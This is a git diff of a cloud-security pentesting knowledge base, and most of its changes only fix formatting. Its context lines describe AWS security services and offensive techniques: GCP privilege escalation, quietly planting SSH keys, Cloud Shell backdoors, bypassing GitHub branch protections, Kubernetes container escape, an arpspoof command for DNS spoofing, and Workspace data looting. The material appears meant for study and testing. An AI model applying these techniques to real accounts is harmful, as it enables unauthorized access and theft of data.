this is a physical device dedicated to you, **the keys are stored on the device**. Keys need to either be **replicated to another device**, backed up to offline storage, or exported to a standby appliance. **This device is not backed** by S3 or any other service at AWS like KMS. In **CloudHSM**, you have to **scale the service yourself**. You have to provision enough CloudHSM devices to handle whatever your encryption needs are based on the encryption algorithms you have chosen to implement for your solution.\ -Key Management Service scaling is performed by AWS and automatically scales on demand, so as your use grows, so might the number of CloudHSM appliances that are required. Keep this in mind as you scale your solution and if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution. +Key Management Service scaling is performed by AWS and automatically scales on demand, so as your use grows, so might the number of CloudHSM appliances that are required. Keep this in mind as you scale your solution and if your solution has auto-scaling, make sure your maximum scale is accounted for with enough CloudHSM appliances to service the solution. Just like scaling, **performance is up to you with CloudHSM**. Performance varies based on which encryption algorithm is used and on how often you need to access or retrieve the keys to encrypt the data. Key management service performance is handled by Amazon and automatically scales as demand requires it. CloudHSM's performance is achieved by adding more appliances and if you need more performance you either add devices or alter the encryption method to the algorithm that is faster. If your solution is **multi-region**, you should add several **CloudHSM appliances in the second region and work out the cross-region connectivity with a private VPN connection** or some method to ensure the traffic is always protected between the appliance at every layer of the connection. If you have a multi-region solution you need to think about how to **replicate keys and set up additional CloudHSM devices in the regions where you operate**. You can very quickly get into a scenario where you have six or eight devices spread across multiple regions, enabling full redundancy of your encryption keys. -**CloudHSM** is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only (cannot act as a certificate authority)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution. +**CloudHSM** is an enterprise class service for secured key storage and can be used as a **root of trust for an enterprise**. It can store private keys in PKI and certificate authority keys in X509 implementations. In addition to symmetric keys used in symmetric algorithms such as AES, **KMS stores and physically protects symmetric keys only (cannot act as a certificate authority)**, so if you need to store PKI and CA keys a CloudHSM or two or three could be your solution. **CloudHSM is considerably more expensive than Key Management Service**. CloudHSM is a hardware appliance so you have fix costs to provision the CloudHSM device, then an hourly cost to run the appliance. The cost is multiplied by as many CloudHSM appliances that are required to achieve your specific requirements.\ Additionally, cross consideration must be made in the purchase of third party software such as SafeNet ProtectV software suites and integration time and effort. Key Management Service is a usage based and depends on the number of keys you have and the input and output operations. As key management provides seamless integration with many AWS services, integration costs should be significantly lower. Costs should be considered secondary factor in encryption solutions. Encryption is typically used for security and compliance. @@ -512,7 +512,7 @@ You can make any of those run on the EC2 machines you decide. * Rules packages to be used * Duration of the assessment run 15min/1hour/8hours * SNS topics, select when notify: Starts, finished, change state, reports a finding -* Attributes to b assigned to findings +* Attributes to b assigned to findings **Rule package**: Contains a number of individual rules that are check against an EC2 when an assessment is run. Each one also have a severity (high, medium, low, informational). The possibilities are: @@ -532,7 +532,7 @@ Note that nowadays AWS already allow you to **autocreate** all the necesary **co **Telemetry**: data that is collected from an instance, detailing its configuration, behavior and processes during an assessment run. Once collected, the data is then sent back to Amazon Inspector in near-real-time over TLS where it is then stored and encrypted on S3 via an ephemeral KMS key. Amazon Inspector then accesses the S3 Bucket, decrypts the data in memory, and analyzes it against any rules packages used for that assessment to generate the findings. -**Assessment Report**: Provide details on what was assessed and the results of the assessment. +**Assessment Report**: Provide details on what was assessed and the results of the assessment. * The **findings report** contain the summary of the assessment, info about the EC2 and rules and the findings that occurred. * The **full report** is the finding report + a list of rules that were passed. @@ -589,7 +589,7 @@ The main function of the service is to provide an automatic method of **detectin The service is backed by **machine learning**, allowing your data to be actively reviewed as different actions are taken within your AWS account. Machine learning can spot access patterns and **user behavior** by analyzing **cloud trail event** data to **alert against any unusual or irregular activity**. Any findings made by Amazon Macie are presented within a dashboard which can trigger alerts, allowing you to quickly resolve any potential threat of exposure or compromise of your data. Amazon Macie will automatically and continuously **monitor and detect new data that is stored in Amazon S3**. Using the abilities of machine learning and artificial intelligence, this service has the ability to familiarize over time, access patterns to data. \ -Amazon Macie also uses natural language processing methods to **classify and interpret different data types and content**. NLP uses principles from computer science and computational linguistics to look at the interactions between computers and the human language. In particular, how to program computers to understand and decipher language data. The **service can automatically assign business values to data that is assessed in the form of a risk score**. This enables Amazon Macie to order findings on a priority basis, enabling you to focus on the most critical alerts first. In addition to this, Amazon Macie also has the added benefit of being able to **monitor and discover security changes governing your data**. As well as identify specific security-centric data such as access keys held within an S3 bucket. +Amazon Macie also uses natural language processing methods to **classify and interpret different data types and content**. NLP uses principles from computer science and computational linguistics to look at the interactions between computers and the human language. In particular, how to program computers to understand and decipher language data. The **service can automatically assign business values to data that is assessed in the form of a risk score**. This enables Amazon Macie to order findings on a priority basis, enabling you to focus on the most critical alerts first. In addition to this, Amazon Macie also has the added benefit of being able to **monitor and discover security changes governing your data**. As well as identify specific security-centric data such as access keys held within an S3 bucket. This protective and proactive security monitoring enables Amazon Macie to identify critical, sensitive, and security focused data such as API keys, secret keys, in addition to PII (personally identifiable information) and PHI data. @@ -615,7 +615,7 @@ Pre-defined alerts categories: * Service disruption * Suspicious access -The **alert summary** provides detailed information to allow you to respond appropriately. It has a description that provides a deeper level of understanding of why it was generated. It also has a breakdown of the results. +The **alert summary** provides detailed information to allow you to respond appropriately. It has a description that provides a deeper level of understanding of why it was generated. It also has a breakdown of the results. The user has the possibility to create new custom alerts. @@ -752,10 +752,10 @@ One key point of EMR is that **by default, the instances within a cluster do not From an encryption in transit perspective, you could enable **open source transport layer security** encryption features and select a certificate provider type which can be either PEM where you will need to manually create PEM certificates, bundle them up with a zip file and then reference the zip file in S3 or custom where you would add a custom certificate provider as a Java class that provides encryption artefacts. -Once the TLS certificate provider has been configured in the security configuration file, the following encryption applications specific encryption features can be enabled which will vary depending on your EMR version. +Once the TLS certificate provider has been configured in the security configuration file, the following encryption applications specific encryption features can be enabled which will vary depending on your EMR version. * Hadoop might reduce encrypted shuffle which uses TLS. Both secure Hadoop RPC which uses Simple Authentication Security Layer, and data encryption of HDFS Block Transfer which uses AES-256, are both activated when at rest encryption is enabled in the security configuration. -* Presto: When using EMR version 5.6.0 and later, any internal communication between Presto nodes will use SSL and TLS. +* Presto: When using EMR version 5.6.0 and later, any internal communication between Presto nodes will use SSL and TLS. * Tez Shuffle Handler uses TLS. * Spark: The Akka protocol uses TLS. Block Transfer Service uses Simple Authentication Security Layer and 3DES. External shuffle service uses the Simple Authentication Security Layer. @@ -779,7 +779,7 @@ Once the database is associated with an option group, you must ensure that the O Amazon Firehose is used to deliver **real-time streaming data to different services** and destinations within AWS, many of which can be used for big data such as S3 Redshift and Amazon Elasticsearch. -The service is fully managed by AWS, taking a lot of the administration of maintenance out of your hands. Firehose is used to receive data from your data producers where it then automatically delivers the data to your chosen destination. +The service is fully managed by AWS, taking a lot of the administration of maintenance out of your hands. Firehose is used to receive data from your data producers where it then automatically delivers the data to your chosen destination. Amazon Streams essentially collects and processes huge amounts of data in real time and makes it available for consumption. @@ -844,7 +844,7 @@ You can have **100 conditions of each type**, such as Geo Match or size constrai ### Rules Using these conditions you can create rules: For example, block request if 2 conditions are met.\ -When creating your rule you will be asked to select a **Rule Type**: **Regular Rule** or **Rate-Based Rule**. +When creating your rule you will be asked to select a **Rule Type**: **Regular Rule** or **Rate-Based Rule**. The only **difference** between a rate-based rule and a regular rule is that **rate-based** rules **count** the **number** of **requests** that are being received from a particular IP address over a time period of **five minutes**. @@ -858,7 +858,7 @@ An action is applied to each rule, these actions can either be **Allow**, **Bloc * When a request is **blocked**, the request is **terminated** there and no further processing of that request is taken. * A **Count** action will **count the number of requests that meet the conditions** within that rule. This is a really good option to select when testing the rules to ensure that the rule is picking up the requests as expected before setting it to either Allow or Block. -If an **incoming request does not meet any rule** within the Web ACL then the request takes the action associated to a **default action** specified which can either be **Allow** or **Block**. An important point to make about these rules is that they are **executed in the order that they are listed within a Web ACL**. So be careful to architect this order correctly for your rule base, **typically** these are **ordered** as shown: +If an **incoming request does not meet any rule** within the Web ACL then the request takes the action associated to a **default action** specified which can either be **Allow** or **Block**. An important point to make about these rules is that they are **executed in the order that they are listed within a Web ACL**. So be careful to architect this order correctly for your rule base, **typically** these are **ordered** as shown: 1. WhiteListed Ips as Allow. 2. BlackListed IPs Block @@ -884,7 +884,7 @@ A **rule group** (a set of WAF rules together) can be added to an AWS Firewall M AWS Shield has been designed to help **protect your infrastructure against distributed denial of service attacks**, commonly known as DDoS. -**AWS Shield Standard** is **free** to everyone, and it offers DDoS **protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53. +**AWS Shield Standard** is **free** to everyone, and it offers DDoS **protection** against some of the more common layer three, the **network layer**, and layer four, **transport layer**, DDoS attacks. This protection is integrated with both CloudFront and Route 53. **AWS Shield advanced** offers a **greater level of protection** for DDoS attacks across a wider scope of AWS services for an additional cost. This advanced level offers protection against your web applications running on EC2, CloudFront, ELB and also Route 53. In addition to these additional resource types being protected, there are enhanced levels of DDoS protection offered compared to that of Standard. And you will also have **access to a 24-by-seven specialized DDoS response team at AWS, known as DRT**. @@ -922,10 +922,10 @@ In addition, take the following into consideration when you use Site-to-Site VPN #### Concepts -* **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated. -* **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone. +* **Client VPN endpoint:** The resource that you create and configure to enable and manage client VPN sessions. It is the resource where all client VPN sessions are terminated. +* **Target network:** A target network is the network that you associate with a Client VPN endpoint. **A subnet from a VPC is a target network**. Associating a subnet with a Client VPN endpoint enables you to establish VPN sessions. You can associate multiple subnets with a Client VPN endpoint for high availability. All subnets must be from the same VPC. Each subnet must belong to a different Availability Zone. * **Route**: Each Client VPN endpoint has a route table that describes the available destination network routes. Each route in the route table specifies the path for traffic to specific resources or networks. -* **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks. +* **Authorization rules:** An authorization rule **restricts the users who can access a network**. For a specified network, you configure the Active Directory or identity provider (IdP) group that is allowed access. Only users belonging to this group can access the specified network. **By default, there are no authorization rules** and you must configure authorization rules to enable users to access resources and networks. * **Client:** The end user connecting to the Client VPN endpoint to establish a VPN session. End users need to download an OpenVPN client and use the Client VPN configuration file that you created to establish a VPN session. * **Client CIDR range:** An IP address range from which to assign client IP addresses. Each connection to the Client VPN endpoint is assigned a unique IP address from the client CIDR range. You choose the client CIDR range, for example, `10.2.0.0/16`. * **Client VPN ports:** AWS Client VPN supports ports 443 and 1194 for both TCP and UDP. The default is port 443. @@ -957,7 +957,7 @@ Amazon Cognito provides **authentication, authorization, and user management** f The two main components of Amazon Cognito are user pools and identity pools. **User pools** are user directories that provide **sign-up and sign-in options for your app users**. **Identity pools** enable you to grant your users **access to other AWS services**. You can use identity pools and user pools separately or together. -### **User pools** +### **User pools** A user pool is a user directory in Amazon Cognito. With a user pool, your users can **sign in to your web or mobile app** through Amazon Cognito, **or federate** through a **third-party** identity provider (IdP). Whether your users sign in directly or through a third party, all members of the user pool have a directory profile that you can access through an SDK. diff --git a/cloud-security/circleci.md b/cloud-security/circleci.md index 1076c680..4d7efb3b 100644 --- a/cloud-security/circleci.md +++ b/cloud-security/circleci.md @@ -2,7 +2,7 @@ ## Basic Information -****[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you ca **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example. +[**CircleCI**](https://circleci.com/docs/2.0/about-circleci/) is a Continuos Integration platform where you ca **define templates** indicating what you want it to do with some code and when to do it. This way you can **automate testing** or **deployments** directly **from your repo master branch** for example. ## Permissions @@ -17,7 +17,7 @@ According to [**the docs**](https://circleci.com/docs/2.0/env-vars/#) there are ### Built-in env variables -Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) **** like **** `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`. +Every container run by CircleCI will always have [**specific env vars defined in the documentation**](https://circleci.com/docs/2.0/env-vars/#built-in-environment-variables) like `CIRCLE_PR_USERNAME`, `CIRCLE_PROJECT_REPONAME` or `CIRCLE_USERNAME`. ### Clear text diff --git a/cloud-security/concourse/concourse-lab-creation.md b/cloud-security/concourse/concourse-lab-creation.md index 7c57e192..035e6960 100644 --- a/cloud-security/concourse/concourse-lab-creation.md +++ b/cloud-security/concourse/concourse-lab-creation.md @@ -79,7 +79,7 @@ A pipeline is made of a list of [Jobs](https://concourse-ci.org/jobs.html) which Several different type of steps can be used: -* **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html)**** +* **the** [**`task` step**](https://concourse-ci.org/task-step.html) **runs a** [**task**](https://concourse-ci.org/tasks.html) * the [`get` step](https://concourse-ci.org/get-step.html) fetches a [resource](https://concourse-ci.org/resources.html) * the [`put` step](https://concourse-ci.org/put-step.html) updates a [resource](https://concourse-ci.org/resources.html) * the [`set_pipeline` step](https://concourse-ci.org/set-pipeline-step.html) configures a [pipeline](https://concourse-ci.org/pipelines.html) diff --git a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md index 302d10f3..9db8a9e2 100644 --- a/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md +++ b/cloud-security/gcp-security/gcp-interesting-permissions/gcp-privesc-to-other-principals.md @@ -37,7 +37,7 @@ Note that **iam.serviceAccountKeys.update won't work to modify the key** of a SA ### iam.serviceAccounts.implicitDelegation -If you have the _**iam.serviceAccounts.implicitDelegation**_\*\* permission on a Service Account\*\* that has the _**iam.serviceAccounts.getAccessToken**_\*\* permission on a third Service Account\*\*, then you can use implicitDelegation to **create a token for that third Service Account**. Here is a diagram to help explain. +If you have the _**iam.serviceAccounts.implicitDelegation**_** permission on a Service Account** that has the _**iam.serviceAccounts.getAccessToken**_** permission on a third Service Account**, then you can use implicitDelegation to **create a token for that third Service Account**. Here is a diagram to help explain. ![](https://rhinosecuritylabs.com/wp-content/uploads/2020/04/image2-500x493.png) @@ -217,7 +217,7 @@ Apparently this permission might be useful to gather auth credentials (basic aut **Kubernetes** by default **prevents** principals from being able to **create** or **update** **RoleBindings** and **ClusterRoleBindings** to give **more permissions** that the ones the principal has. However, a **GCP** principal with that permissions will be **able to create/update RolesBindings/ClusterRolesBindings with more permissions** that ones he has, effectively bypassing the Kubernetes protection against this behaviour. -**container.roleBindings.create** and/or **container.roleBindings.update** OR **container.clusterRoleBindings.create** and/or **container.clusterRoleBindings.update** respectively **** are also **necessary** to perform those privilege escalation actions. +**container.roleBindings.create** and/or **container.roleBindings.update** OR **container.clusterRoleBindings.create** and/or **container.clusterRoleBindings.update** respectively are also **necessary** to perform those privilege escalation actions. ### container.cronJobs.create, container.cronJobs.update container.daemonSets.create, container.daemonSets.update container.deployments.create, container.deployments.update container.jobs.create, container.jobs.update container.pods.create, container.pods.update container.replicaSets.create, container.replicaSets.update container.replicationControllers.create, container.replicationControllers.update container.scheduledJobs.create, container.scheduledJobs.update container.statefulSets.create, container.statefulSets.update @@ -255,7 +255,7 @@ For more information [**follow this link**](../../pentesting-kubernetes/abusing- ### storage.hmacKeys.create -There is a feature of Cloud Storage, “interoperability”, that provides a way for Cloud Storage to interact with storage offerings from other cloud providers, like AWS S3. As part of that, there are HMAC keys that can be created for both Service Accounts and regular users. We can **escalate Cloud Storage permissions by creating an HMAC key for a higher-privileged Service Account**. +There is a feature of Cloud Storage, “interoperability”, that provides a way for Cloud Storage to interact with storage offerings from other cloud providers, like AWS S3. As part of that, there are HMAC keys that can be created for both Service Accounts and regular users. We can **escalate Cloud Storage permissions by creating an HMAC key for a higher-privileged Service Account**. HMAC keys belonging to your user cannot be accessed through the API and must be accessed through the web console, but what’s nice is that both the access key and secret key are available at any point. This means we could take an existing pair and store them for backup access to the account. HMAC keys belonging to Service Accounts **can** be accessed through the API, but after creation, you are not able to see the access key and secret again. diff --git a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md b/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md index 15c6f6f2..5028c166 100644 --- a/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md +++ b/cloud-security/gcp-security/gcp-local-privilege-escalation-ssh-pivoting.md @@ -58,7 +58,7 @@ So, if you can **modify custom instance metadata** with your service account, yo ### **Add SSH key to existing privileged user** -Let's start by adding our own key to an existing account, as that will probably make the least noise. +Let's start by adding our own key to an existing account, as that will probably make the least noise. **Check the instance for existing SSH keys**. Pick one of these users as they are likely to have sudo rights. @@ -161,7 +161,7 @@ If you're really bold, you can also just type `gcloud compute ssh [INSTANCE]` to ## **Using OS Login** -****[**OS Login**](https://cloud.google.com/compute/docs/oslogin/) **** is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances. +[**OS Login**](https://cloud.google.com/compute/docs/oslogin/) is an alternative to managing SSH keys. It links a **Google user or service account to a Linux identity**, relying on IAM permissions to grant or deny access to Compute Instances. OS Login is [enabled](https://cloud.google.com/compute/docs/instances/managing-instance-access#enable\_oslogin) at the project or instance level using the metadata key of `enable-oslogin = TRUE`. diff --git a/cloud-security/gcp-security/gcp-looting.md b/cloud-security/gcp-security/gcp-looting.md index ab111742..aa0582fb 100644 --- a/cloud-security/gcp-security/gcp-looting.md +++ b/cloud-security/gcp-security/gcp-looting.md @@ -115,7 +115,7 @@ kubectl cluster-info You can read more about `gcloud` for containers [here](https://cloud.google.com/sdk/gcloud/reference/container/). -This is a simple script to enumerate kubernetes in GCP: [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum) +This is a simple script to enumerate kubernetes in GCP: [https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum](https://gitlab.com/gitlab-com/gl-security/security-operations/gl-redteam/gcp\_k8s\_enum) ## References diff --git a/cloud-security/gcp-security/gcp-persistance.md b/cloud-security/gcp-security/gcp-persistance.md index 5a202bca..5b91c63d 100644 --- a/cloud-security/gcp-security/gcp-persistance.md +++ b/cloud-security/gcp-security/gcp-persistance.md @@ -6,9 +6,9 @@ These are useful techniques once, somehow, you have compromised some GCP credent ### Persistent Backdoor -[**Google Cloud Shell**](https://cloud.google.com/shell/) **** provides you with command-line access to your cloud resources directly from your browser without any associated cost. +[**Google Cloud Shell**](https://cloud.google.com/shell/) provides you with command-line access to your cloud resources directly from your browser without any associated cost. -You can access Google's Cloud Shell from the **web console** or running **`gcloud cloud-shell ssh`**. +You can access Google's Cloud Shell from the **web console** or running **`gcloud cloud-shell ssh`**. This console has some interesting capabilities for attackers: diff --git a/cloud-security/github-security/README.md b/cloud-security/github-security/README.md index 1ed57849..d4381a8d 100644 --- a/cloud-security/github-security/README.md +++ b/cloud-security/github-security/README.md @@ -12,7 +12,7 @@ ## External Recon -Github repositories can be configured as public, private and internal. +Github repositories can be configured as public, private and internal. * **Private** means that **only** people of the **organisation** will be able to access them * **Internal** means that **only** people of the **enterprise** (an enterprise may have several organisations) will be able to access it @@ -80,7 +80,7 @@ If the user has configured its username as his github username you can access th As explained [**here**](basic-github-information.md#ssh-keys) sometimes it's needed to sign the commits or you might get discovered. -Check locally if the current user has any key with: +Check locally if the current user has any key with: ```shell gpg --list-secret-keys --keyid-format=long @@ -248,7 +248,7 @@ jobs: * **Include administrators**: If this isn’t set and you are admin of the repo, you can bypass this branch protections. * **PR Hijacking**: You could be able to **modify the PR of someone else** adding malicious code, approving the resulting PR yourself and merging everything. * **Removing Branch Protections**: If you are an **admin of the repo you can disable the protections**, merge your PR and set the protections back. -* **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`). +* **Bypassing push protections**: If a repo **only allows certain users** to send push (merge code) in branches (the branch protection might be protecting all the branches specifying the wildcard `*`). * If you have **write access over the repo but you are not allowed to push code** because of the branch protection, you can still **create a new branch** and within it create a **github action that is triggered when code is pushed**. As the **branch protection won't protect the branch until it's created**, this first code push to the branch will **execute the github action**. ### Bypass Environments Protections diff --git a/cloud-security/github-security/basic-github-information.md b/cloud-security/github-security/basic-github-information.md index b1050eb4..13e45c0d 100644 --- a/cloud-security/github-security/basic-github-information.md +++ b/cloud-security/github-security/basic-github-information.md @@ -25,7 +25,7 @@ In an organisation users can have different roles: * **Organization members**: The **default**, non-administrative role for **people in an organization** is the organization member. By default, organization members **have a number of permissions**. * **Billing managers**: Billing managers are users who can **manage the billing settings for your organization**, such as payment information. * **Security Managers**: It's a role that organization owners can assign to any team in an organization. When applied, it gives every member of the team permissions to **manage security alerts and settings across your organization, as well as read permissions for all repositories** in the organization. - * If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization. + * If your organization has a security team, you can use the security manager role to give members of the team the least access they need to the organization. * **Github App managers**: To allow additional users to **manage GitHub Apps owned by an organization**, an owner can grant them GitHub App manager permissions. * **Outside collaborators**: An outside collaborator is a person who has **access to one or more organization repositories but is not explicitly a member** of the organization. diff --git a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md index 4e7ed9d7..fa11e4d0 100644 --- a/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md +++ b/cloud-security/pentesting-kubernetes/abusing-roles-clusterroles-in-kubernetes/README.md @@ -236,7 +236,7 @@ kubectl port-forward pod/mypod 5000:5000 ### **Hosts Writable /var/log/ Escape** - **** As [**indicated in this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html)**,**If you can access or create a pod with the **hosts `/var/log/` directory mounted** on it, you can **escape from the container**.\ + As [**indicated in this research**](https://jackleadford.github.io/containers/2020/03/06/pvpost.html)**,**If you can access or create a pod with the **hosts `/var/log/` directory mounted** on it, you can **escape from the container**.\ This is basically because the when the **Kube-API tries to get the logs** of a container (using `kubectl logs `), it **requests the `0.log`** file of the pod using the `/logs/` endpoint of the **Kubelet** service.\ The Kubelet service exposes the `/logs/` endpoint which is just basically **exposing the `/var/log` filesystem of the container**. diff --git a/cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md b/cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md index 51c3b468..1e7d2a28 100644 --- a/cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md +++ b/cloud-security/pentesting-kubernetes/kubernetes-access-to-other-clouds.md @@ -11,7 +11,7 @@ A common way to give **access to a kubernetes application to GCP** is to: * Create a GCP Service Account * Bind on it the desired permissions * Download a json key of the created SA -* Mount it as a secret inside the pod +* Mount it as a secret inside the pod * Set the GOOGLE\_APPLICATION\_CREDENTIALS environment variable pointing to the path where the json is. {% hint style="warning" %} @@ -161,7 +161,7 @@ As an attacker, if you can enumerate a K8s cluster, check for **service accounts Moreover, if you are inside a pod, check for env variables like **AWS\_ROLE\_ARN** and **AWS\_WEB\_IDENTITY\_TOKEN.** -**** + {% endhint %} ### Find Pods a SAs with IAM Roles in the Cluster diff --git a/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md b/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md index 49cfd5b2..9ef2bd72 100644 --- a/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md +++ b/cloud-security/pentesting-kubernetes/kubernetes-enumeration.md @@ -23,7 +23,7 @@ Usually **one** of the directories: * `/run/secrets/kubernetes.io/serviceaccount` * `/var/run/secrets/kubernetes.io/serviceaccount` -* `/secrets/kubernetes.io/serviceaccount` +* `/secrets/kubernetes.io/serviceaccount` contain the files: @@ -61,7 +61,7 @@ In order to enumerate a K8s environment you need a couple of this: With those details you can **enumerate kubernetes**. If the **API** for some reason is **accessible** through the **Internet**, you can just download that info and enumerate the platform from your host. -However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server. +However, usually the **API server is inside an internal network**, therefore you will need to **create a tunnel** through the compromised machine to access it from your machine, or you can **upload the** [**kubectl**](https://kubernetes.io/docs/tasks/tools/install-kubectl-linux/#install-kubectl-binary-with-curl-on-linux) binary, or use **`curl/wget/anything`** to perform raw HTTP requests to the API server. ### Differences between `list` and `get` verbs diff --git a/cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md b/cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md index f7fa110f..75902a8c 100644 --- a/cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md +++ b/cloud-security/pentesting-kubernetes/kubernetes-network-attacks.md @@ -247,7 +247,7 @@ arpspoof -t 172.17.0.9 172.17.0.10 As it was already mentioned, if you **compromise a pod in the same node of the DNS server pod**, you can **MitM** with **ARPSpoofing** the **bridge and the DNS** pod and **modify all the DNS responses**. -You have a really nice **tool** and **tutorial** to test this in [**https://github.com/danielsagi/kube-dnsspoof/**](https://github.com/danielsagi/kube-dnsspoof/)**** +You have a really nice **tool** and **tutorial** to test this in [**https://github.com/danielsagi/kube-dnsspoof/**](https://github.com/danielsagi/kube-dnsspoof/) In our scenario, **download** the **tool** in the attacker pod and create a **file named `hosts` ** with the **domains** you want to **spoof** like: @@ -282,5 +282,5 @@ You need to generate a **new DNS packet** with the **src IP** of the **DNS** whe ## References -* ****[https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1) +* [https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1](https://www.cyberark.com/resources/threat-research-blog/attacking-kubernetes-clusters-through-your-network-plumbing-part-1) * [https://blog.aquasec.com/dns-spoofing-kubernetes-clusters](https://blog.aquasec.com/dns-spoofing-kubernetes-clusters) diff --git a/cloud-security/workspace-security.md b/cloud-security/workspace-security.md index 91a498f4..f740b415 100644 --- a/cloud-security/workspace-security.md +++ b/cloud-security/workspace-security.md @@ -104,7 +104,7 @@ This also means that the **App Script will be trusted by the Workspace environme {% hint style="danger" %} This also means that if an **App Script already existed** and people has **granted access**, anyone with **Editor** permission to the doc can **modify it and abuse that access.**\ -****To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `` tags. +To abuse this you also need people to trigger the App Script. And one neat trick if to **publish the script as a web app**. When the **people** that already granted **access** to the App Script access the web page, they will **trigger the App Script** (this also works using `` tags. {% endhint %} ## Post-Exploitation @@ -123,15 +123,15 @@ You potentially need access to the console to join groups that allow to be joine ### Access Groups Mail info -If you managed to **compromise a google user session**, from [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups) **** you can see the history of mails sent to the mail groups the user is member of, and you might find **credentials** or other **sensitive data**. +If you managed to **compromise a google user session**, from [**https://groups.google.com/all-groups**](https://groups.google.com/all-groups) you can see the history of mails sent to the mail groups the user is member of, and you might find **credentials** or other **sensitive data**. ### Takeout - Download Everything Google Knows about an account -If you have a **session inside victims google account** you can download everything Google saves about that account from [**https://takeout.google.com**](https://takeout.google.com/u/1/?pageId=none)**** +If you have a **session inside victims google account** you can download everything Google saves about that account from [**https://takeout.google.com**](https://takeout.google.com/u/1/?pageId=none) ### Vault - Download all the Workspace data of users -If an organization has **Google Vault enabled**, you might be able to access [**https://vault.google.com**](https://vault.google.com/u/1/) **** and **download** all the **information**. +If an organization has **Google Vault enabled**, you might be able to access [**https://vault.google.com**](https://vault.google.com/u/1/) and **download** all the **information**. ### Contacts download @@ -156,7 +156,7 @@ For sake of simplicity, most of the people will generate and share a link instea Some proposed ways to find all the documents: * Search in internal chat, forums... -* **Spider** known **documents** searching for **references** to other documents. You can do this within an App Script with[ **PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser)**** +* **Spider** known **documents** searching for **references** to other documents. You can do this within an App Script with[ **PaperChaser**](https://github.com/mandatoryprogrammer/PaperChaser) ### **Keep Notes** @@ -198,7 +198,7 @@ The docs mention that to use `ScriptApp.newTrigger("funcion")` you need the **sc In [**https://admin.google.com**/](https://admin.google.com), if you have enough permissions you might be able to modify settings in the Workspace of the whole organization. -You can also search emails through all the users invoices in [**https://admin.google.com/ac/emaillogsearch**](https://admin.google.com/ac/emaillogsearch)**** +You can also search emails through all the users invoices in [**https://admin.google.com/ac/emaillogsearch**](https://admin.google.com/ac/emaillogsearch) ## Account Compromised Recovery diff --git a/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md b/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md index 7bcc607c..47789094 100644 --- a/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md +++ b/courses-and-certifications-reviews/ine-courses-and-elearnsecurity-certifications-reviews.md @@ -2,7 +2,7 @@ ## eLearnSecurity Mobile Application Penetration Tester 